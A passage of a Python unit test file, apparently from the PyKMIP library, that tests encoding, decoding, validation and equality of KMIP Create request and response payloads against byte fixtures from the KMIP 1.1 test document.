self.full_encoding_with_attributes = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x60'
b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
b'\x42\x01\x25\x01\x00\x00\x00\x30'
b'\x42\x00\x28\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
b'\x42\x00\x2A\x02\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00'
b'\x42\x00\x2C\x02\x00\x00\x00\x04\x00\x00\x00\x0C\x00\x00\x00\x00'
b'\x42\x01\x5F\x01\x00\x00\x00\x10'
b'\x42\x01\x5E\x02\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
)
# Encoding obtained from the KMIP 1.1 testing document,
# Section 3.1.1.
#
# This encoding matches the following set of values:
# Request Payload
# Template Attribute
# Attribute
# Attribute Name - Cryptographic Algorithm
# Attribute Value - AES
# Attribute
# Attribute Name - Cryptographic Length
# Attribute Value - 128
# Attribute
# Attribute Name - Cryptographic Usage Mask
# Attribute Value - Encrypt | Decrypt
self.no_object_type_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\xB0'
b'\x42\x00\x91\x01\x00\x00\x00\xA8'
b'\x42\x00\x08\x01\x00\x00\x00\x30'
b'\x42\x00\x0A\x07\x00\x00\x00\x17'
b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x41\x6C'
b'\x67\x6F\x72\x69\x74\x68\x6D\x00'
b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
b'\x42\x00\x08\x01\x00\x00\x00\x30'
b'\x42\x00\x0A\x07\x00\x00\x00\x14'
b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x4C\x65'
b'\x6E\x67\x74\x68\x00\x00\x00\x00'
b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x80\x00\x00\x00\x00'
b'\x42\x00\x08\x01\x00\x00\x00\x30'
b'\x42\x00\x0A\x07\x00\x00\x00\x18'
b'\x43\x72\x79\x70\x74\x6F\x67\x72\x61\x70\x68\x69\x63\x20\x55\x73'
b'\x61\x67\x65\x20\x4D\x61\x73\x6B'
b'\x42\x00\x0B\x02\x00\x00\x00\x04\x00\x00\x00\x0C\x00\x00\x00\x00'
)
# Encoding obtained from the KMIP 1.1 testing document,
# Section 3.1.1.
#
# This encoding matches the following set of values:
# Request Payload
# Object Type - Symmetric Key
self.no_template_attribute_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x10'
b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
)
def tearDown(self):
super(TestCreateRequestPayload, self).tearDown()
def test_invalid_object_type(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the object type of a Create request payload.
"""
kwargs = {'object_type': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
payloads.CreateRequestPayload,
**kwargs
)
args = (
payloads.CreateRequestPayload(),
'object_type',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
setattr,
*args
)
def test_invalid_template_attribute(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the template attribute of a Create request payload.
"""
kwargs = {'template_attribute': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
payloads.CreateRequestPayload,
**kwargs
)
args = (
payloads.CreateRequestPayload(),
'template_attribute',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
setattr,
*args
)
def test_invalid_protection_storage_masks(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the protection storage masks of a Create request payload.
"""
kwargs = {"protection_storage_masks": "invalid"}
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure.",
payloads.CreateRequestPayload,
**kwargs
)
kwargs = {
"protection_storage_masks": objects.ProtectionStorageMasks(
tag=enums.Tags.COMMON_PROTECTION_STORAGE_MASKS
)
}
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure with a ProtectionStorageMasks tag.",
payloads.CreateRequestPayload,
**kwargs
)
args = (
payloads.CreateRequestPayload(),
"protection_storage_masks",
"invalid"
)
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure.",
setattr,
*args
)
args = (
payloads.CreateRequestPayload(),
"protection_storage_masks",
objects.ProtectionStorageMasks(
tag=enums.Tags.COMMON_PROTECTION_STORAGE_MASKS
)
)
self.assertRaisesRegex(
TypeError,
"The protection storage masks must be a ProtectionStorageMasks "
"structure with a ProtectionStorageMasks tag.",
setattr,
*args
)
def test_read(self):
"""
Test that a Create request payload can be read from a data stream.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
self.assertIsNone(payload.protection_storage_masks)
payload.read(self.full_encoding)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
payload.object_type
)
self.assertEqual(
objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
payload.template_attribute
)
self.assertIsNone(payload.protection_storage_masks)
def test_read_kmip_2_0(self):
"""
Test that a Create request payload can be read from a data stream
encoded with the KMIP 2.0 format.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
self.assertIsNone(payload.protection_storage_masks)
payload.read(
self.full_encoding_with_attributes,
kmip_version=enums.KMIPVersion.KMIP_2_0
)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
payload.object_type
)
self.assertEqual(
objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
payload.template_attribute
)
self.assertEqual(
objects.ProtectionStorageMasks(protection_storage_masks=[3]),
payload.protection_storage_masks
)
def test_read_missing_object_type(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create request payload when the object type is missing from the
encoding.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
args = (self.no_object_type_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create request payload encoding is missing the object type.",
payload.read,
*args
)
def test_read_missing_template_attribute(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create request payload when the template attribute is missing
from the encoding.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
args = (self.no_template_attribute_encoding, )
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create request payload encoding is missing the template "
"attribute.",
payload.read,
*args
)
def test_read_missing_attributes(self):
"""
Test that an InvalidKmipEncoding error is raised during the decoding
of a Create request payload when the attributes structure is missing
from the encoding.
"""
payload = payloads.CreateRequestPayload()
self.assertIsNone(payload.object_type)
self.assertIsNone(payload.template_attribute)
args = (self.no_template_attribute_encoding, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_2_0}
self.assertRaisesRegex(
exceptions.InvalidKmipEncoding,
"The Create request payload encoding is missing the attributes "
"structure.",
payload.read,
*args,
**kwargs
)
def test_write(self):
"""
Test that a Create request payload can be written to a data stream.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
)
)
stream = utils.BytearrayStream()
payload.write(stream)
self.assertEqual(len(self.full_encoding), len(stream))
self.assertEqual(str(self.full_encoding), str(stream))
def test_write_kmip_2_0(self):
"""
Test that a Create request payload can be written to a data stream
encoded with the KMIP 2.0 format.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
stream = utils.BytearrayStream()
payload.write(stream, kmip_version=enums.KMIPVersion.KMIP_2_0)
self.assertEqual(len(self.full_encoding_with_attributes), len(stream))
self.assertEqual(str(self.full_encoding_with_attributes), str(stream))
def test_write_missing_object_type(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create request payload when the payload is missing the object type.
"""
payload = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
)
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create request payload is missing the object type field.",
payload.write,
*args
)
def test_write_missing_template_attribute(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create request payload when the payload is missing the template
attribute.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
stream = utils.BytearrayStream()
args = (stream, )
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create request payload is missing the template attribute "
"field.",
payload.write,
*args
)
def test_write_missing_attributes(self):
"""
Test that an InvalidField error is raised during the encoding of a
Create request payload when the payload is missing the template
attribute.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
stream = utils.BytearrayStream()
args = (stream, )
kwargs = {"kmip_version": enums.KMIPVersion.KMIP_2_0}
self.assertRaisesRegex(
exceptions.InvalidField,
"The Create request payload is missing the template attribute "
"field.",
payload.write,
*args,
**kwargs
)
def test_repr(self):
"""
Test that repr can be applied to a Create request payload structure.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
self.assertEqual(
"CreateRequestPayload("
"object_type=ObjectType.SYMMETRIC_KEY, "
"template_attribute=Struct(), "
"protection_storage_masks=ProtectionStorageMasks("
"protection_storage_masks=[3]))",
repr(payload)
)
def test_str(self):
"""
Test that str can be applied to a Create request payload structure.
"""
payload = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
self.assertEqual(
'{'
'"object_type": ObjectType.SYMMETRIC_KEY, '
'"template_attribute": Struct(), '
'"protection_storage_masks": {"protection_storage_masks": [3]}'
'}',
str(payload)
)
def test_equal_on_equal(self):
"""
Test that the equality operator returns True when comparing two Create
request payloads with the same data.
"""
a = payloads.CreateRequestPayload()
b = payloads.CreateRequestPayload()
self.assertTrue(a == b)
self.assertTrue(b == a)
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
self.assertTrue(a == b)
self.assertTrue(b == a)
def test_equal_on_not_equal_object_type(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different object types.
"""
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SECRET_DATA
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_not_equal_template_attribute(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different template attributes.
"""
a = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
]
)
)
b = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
)
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_not_equal_protection_storage_masks(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different protection storage masks.
"""
a = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.ON_SYSTEM.value |
enums.ProtectionStorageMask.OFF_SYSTEM.value
)
]
)
)
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_equal_on_type_mismatch(self):
"""
Test that the equality operator returns False when comparing two Create
request payloads with different types.
"""
a = payloads.CreateRequestPayload()
b = 'invalid'
self.assertFalse(a == b)
self.assertFalse(b == a)
def test_not_equal_on_equal(self):
"""
Test that the inequality operator returns False when comparing two
Create request payloads with the same data.
"""
a = payloads.CreateRequestPayload()
b = payloads.CreateRequestPayload()
self.assertFalse(a != b)
self.assertFalse(b != a)
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY,
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
),
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Usage Mask'
),
attribute_value=primitives.Integer(
value=(
enums.CryptographicUsageMask.ENCRYPT.value |
enums.CryptographicUsageMask.DECRYPT.value
),
tag=enums.Tags.CRYPTOGRAPHIC_USAGE_MASK
)
)
]
),
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
self.assertFalse(a != b)
self.assertFalse(b != a)
def test_not_equal_on_not_equal_object_type(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different object types.
"""
a = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SYMMETRIC_KEY
)
b = payloads.CreateRequestPayload(
object_type=enums.ObjectType.SECRET_DATA
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_not_equal_template_attribute(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different template attributes.
"""
a = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Algorithm'
),
attribute_value=primitives.Enumeration(
enums.CryptographicAlgorithm,
value=enums.CryptographicAlgorithm.AES,
tag=enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
)
]
)
)
b = payloads.CreateRequestPayload(
template_attribute=objects.TemplateAttribute(
attributes=[
objects.Attribute(
attribute_name=objects.Attribute.AttributeName(
'Cryptographic Length'
),
attribute_value=primitives.Integer(
value=128,
tag=enums.Tags.CRYPTOGRAPHIC_LENGTH
)
)
]
)
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_not_equal_protection_storage_masks(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different protection storage masks.
"""
a = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.SOFTWARE.value |
enums.ProtectionStorageMask.HARDWARE.value
)
]
)
)
b = payloads.CreateRequestPayload(
protection_storage_masks=objects.ProtectionStorageMasks(
protection_storage_masks=[
(
enums.ProtectionStorageMask.ON_SYSTEM.value |
enums.ProtectionStorageMask.OFF_SYSTEM.value
)
]
)
)
self.assertTrue(a != b)
self.assertTrue(b != a)
def test_not_equal_on_type_mismatch(self):
"""
Test that the inequality operator returns True when comparing two
Create request payloads with different types.
"""
a = payloads.CreateRequestPayload()
b = 'invalid'
self.assertTrue(a != b)
self.assertTrue(b != a)
class TestCreateResponsePayload(testtools.TestCase):
def setUp(self):
super(TestCreateResponsePayload, self).setUp()
# Encoding obtained in part from the KMIP 1.1 testing document,
# Section 3.1.1. The TemplateAttribute was added manually from the
# Create request payload encoding.
#
# This encoding matches the following set of values:
# Response Payload
# Object Type - Symmetric Key
# Unique Identifier - fb4b5b9c-6188-4c63-8142-fe9c328129fc
# Template Attribute
# Attribute
# Attribute Name - State
# Attribute Value - PRE_ACTIVE
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x70'
b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
b'\x42\x00\x94\x07\x00\x00\x00\x24'
b'\x66\x62\x34\x62\x35\x62\x39\x63\x2D\x36\x31\x38\x38\x2D\x34\x63'
b'\x36\x33\x2D\x38\x31\x34\x32\x2D\x66\x65\x39\x63\x33\x32\x38\x31'
b'\x32\x39\x66\x63\x00\x00\x00\x00'
b'\x42\x00\x91\x01\x00\x00\x00\x28'
b'\x42\x00\x08\x01\x00\x00\x00\x20'
b'\x42\x00\x0A\x07\x00\x00\x00\x05'
b'\x53\x74\x61\x74\x65\x00\x00\x00'
b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
)
# Encoding obtained in part from the KMIP 1.1 testing document,
# Section 3.1.1. The TemplateAttribute was added manually from the
# Create request payload encoding.
#
# This encoding matches the following set of values:
# Response Payload
# Unique Identifier - fb4b5b9c-6188-4c63-8142-fe9c328129fc
# Template Attribute
# Attribute
# Attribute Name - State
# Attribute Value - PRE_ACTIVE
self.no_object_type_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x60'
b'\x42\x00\x94\x07\x00\x00\x00\x24'
b'\x66\x62\x34\x62\x35\x62\x39\x63\x2D\x36\x31\x38\x38\x2D\x34\x63'
b'\x36\x33\x2D\x38\x31\x34\x32\x2D\x66\x65\x39\x63\x33\x32\x38\x31'
b'\x32\x39\x66\x63\x00\x00\x00\x00'
b'\x42\x00\x91\x01\x00\x00\x00\x28'
b'\x42\x00\x08\x01\x00\x00\x00\x20'
b'\x42\x00\x0A\x07\x00\x00\x00\x05'
b'\x53\x74\x61\x74\x65\x00\x00\x00'
b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
)
# Encoding obtained in part from the KMIP 1.1 testing document,
# Section 3.1.1. The TemplateAttribute was added manually from the
# Create request payload encoding.
#
# This encoding matches the following set of values:
# Response Payload
# Object Type - Symmetric Key
# Template Attribute
# Attribute
# Attribute Name - State
# Attribute Value - PRE_ACTIVE
self.no_unique_identifier_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x50'
b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
b'\x42\x00\x91\x01\x00\x00\x00\x28'
b'\x42\x00\x08\x01\x00\x00\x00\x20'
b'\x42\x00\x0A\x07\x00\x00\x00\x05'
b'\x53\x74\x61\x74\x65\x00\x00\x00'
b'\x42\x00\x0B\x05\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00'
)
# Encoding obtained in part from the KMIP 1.1 testing document,
# Section 3.1.1.
#
# This encoding matches the following set of values:
# Response Payload
# Object Type - Symmetric Key
# Unique Identifier - fb4b5b9c-6188-4c63-8142-fe9c328129fc
self.no_template_attribute_encoding = utils.BytearrayStream(
b'\x42\x00\x7C\x01\x00\x00\x00\x40'
b'\x42\x00\x57\x05\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00'
b'\x42\x00\x94\x07\x00\x00\x00\x24'
b'\x66\x62\x34\x62\x35\x62\x39\x63\x2D\x36\x31\x38\x38\x2D\x34\x63'
b'\x36\x33\x2D\x38\x31\x34\x32\x2D\x66\x65\x39\x63\x33\x32\x38\x31'
b'\x32\x39\x66\x63\x00\x00\x00\x00'
)
def tearDown(self):
super(TestCreateResponsePayload, self).tearDown()
def test_invalid_object_type(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the object type of a Create response payload.
"""
kwargs = {'object_type': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
payloads.CreateResponsePayload,
**kwargs
)
args = (
payloads.CreateResponsePayload(),
'object_type',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Object type must be an ObjectType enumeration.",
setattr,
*args
)
def test_invalid_unique_identifier(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the unique identifier of a Create response payload.
"""
kwargs = {'unique_identifier': 0}
self.assertRaisesRegex(
TypeError,
"Unique identifier must be a string.",
payloads.CreateResponsePayload,
**kwargs
)
args = (payloads.CreateResponsePayload(), 'unique_identifier', 0)
self.assertRaisesRegex(
TypeError,
"Unique identifier must be a string.",
setattr,
*args
)
def test_invalid_template_attribute(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the template attribute of a Create response payload.
"""
kwargs = {'template_attribute': 'invalid'}
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
payloads.CreateResponsePayload,
**kwargs
)
args = (
payloads.CreateResponsePayload(),
'template_attribute',
'invalid'
)
self.assertRaisesRegex(
TypeError,
"Template attribute must be a TemplateAttribute structure.",
setattr,
*args
)
def test_read(self):
"""
Test that a Create response payload can be read from a data stream.
"""
payload = payloads.CreateResponsePayload()
self.assertEqual(None, payload.object_type)
self.assertEqual(None, payload.unique_identifier)
self.assertEqual(None, payload.template_attribute)
payload.read(self.full_encoding)
self.assertEqual(
enums.ObjectType.SYMMETRIC_KEY,
